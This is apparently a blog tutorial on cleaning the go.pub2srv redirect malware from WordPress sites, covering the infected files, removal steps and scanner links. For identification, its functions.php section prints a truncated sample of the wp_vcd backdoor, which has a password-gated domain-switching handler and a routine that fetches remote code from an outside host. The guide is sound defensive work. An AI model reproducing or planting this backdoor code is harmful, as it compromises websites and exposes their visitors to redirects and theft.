How To Remove Go.pub2srv Malware from your WordPress Site

Is your WordPress website infected with javascript malware? This ad malware randomly redirects the site/browser to an ad link/external website. This malware infection redirects your website visitors to other malicious domains like go.pub2srv[.]com, go.mobisla[.]com, go.oclaserver[.com].

Here I've provided you with a tutorial on what this malware is all about, what causes this and how to fix this. So stay cool, grab a cup of coffee and continue reading...

Picture Credits: PC Malware Security

What is Go.pub2srv Malware?

It is a malware that redirects to a spammy website with advertisement, p*rn, phishing pages. On mobile devices, it gives an uber popup/popup messages.

What Causes this Go.pub2srv Malware?

In most cases, this is caused by hacks, and it is also caused when you download themes/plugins from an unsafe website and install them on your website.

So it is always advisable to scan the themes/plugins you download from a third-party website (outside wordpress.org directory) on Virus total.

Consequences of Hack?

Since the main cause of this malware is an SQL injection (SQLi) vulnerability, an attacker can do the following:

• Add, delete, edit or read content in the database
• Read source code from files on the database server
• Write files to the database server
• Steal user records & passwords of your WordPress/Opencart website
• Theft of transaction information in your OpenCart/WooCommerce stores
• Perform SEO spam on your domain resulting in Google Webmasters blacklist

Credits: getastra.com

How To Remove this Go.pub2srv Malware Code on WordPress?

Before knowing how to remove this code, you should know where these codes are been found in your WordPress files. These codes are found in the following files:

• index.php
• functions.php
• Database tables

The first step to go in removing this go.pub2srv malware from your site is:

• Take a backup of your WordPress files (or zip the entire folder) so you can restore them if anything goes wrong.
• Change your Password so the hacker won't get access anymore after carrying out the below steps;
• Go to your themes directory and delete all unused themes. 
• Remove all plugins downloaded from unknow sources.
• In your active theme, open/edit the function.php file and remove the lines of unfamiliar codes from the beginning. Below is a sample of the code.

 Code:

---

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f6efce15ddb7aa5764e90dffbfd5cfdc')) {
$div_code_name = "wp_vcd";
switch ($_REQUEST['action']) {
case 'change_domain';
if (isset($_REQUEST['newdomain'])) {
if (!empty($_REQUEST['newdomain'])) {
if ($file = @file_get_contents(__FILE__)) {
if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code5\.php/i', $file, $matcholddomain)) {
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if (!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "

---

After modifying, Click Save.

• In wp-include directory, delete wp-vcd.php, class.wp.php and wp-tmp.php files.
• In wp-include directory, open post.php and and delete the first php tag added by malware.

FAQ

• If I delete class.wp.php, WordPress crashes.
• What exactly is deleted in post.php, because I couldn’t find any difference compared to an original post.php file.

The answer to the above question is to download the latest WordPress installation after that, delete wp-include and wp-admin folder and all files in public_html except wp-content folder, .htaccess file and wp-config.php file.

After that replace deleted files and folder with the fresh downloaded WordPress.

Usefull Links & Credits

Services:

• https://quttera.com
• https://sitecheck.sucuri.net/
• https://wordpress.org/plugins/sucuri-scanner/
• http://sucuri.net/malware/entry/MW:BLK:2
• http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1 

Resource:

• https://www.getastra.com/blog/911/how-to-remove-pub2srv-malware-from-your-wordpress-opencart-website/
• https://toster.ru/q/482218
• https://pastebin.com/bzcCHnT3
• https://wordpress.org/support/topic/mwjsgen2rogueads-unwanted_ads-1-2/
• https://www.upwork.com/job/prevent-SQL-injection-PHP-hardening-wordpress-stop-website-hacks_~013dcf70c6f4637ad3/
• https://fixmywp.com/blog/detect-clean-wordpress-malware-redirect.php
• https://stackoverflow.com/questions/46219263/php-code-in-functions-php-of-all-wordpress-websites-on-my-shared-hosting

Thanks, and Stay Safe!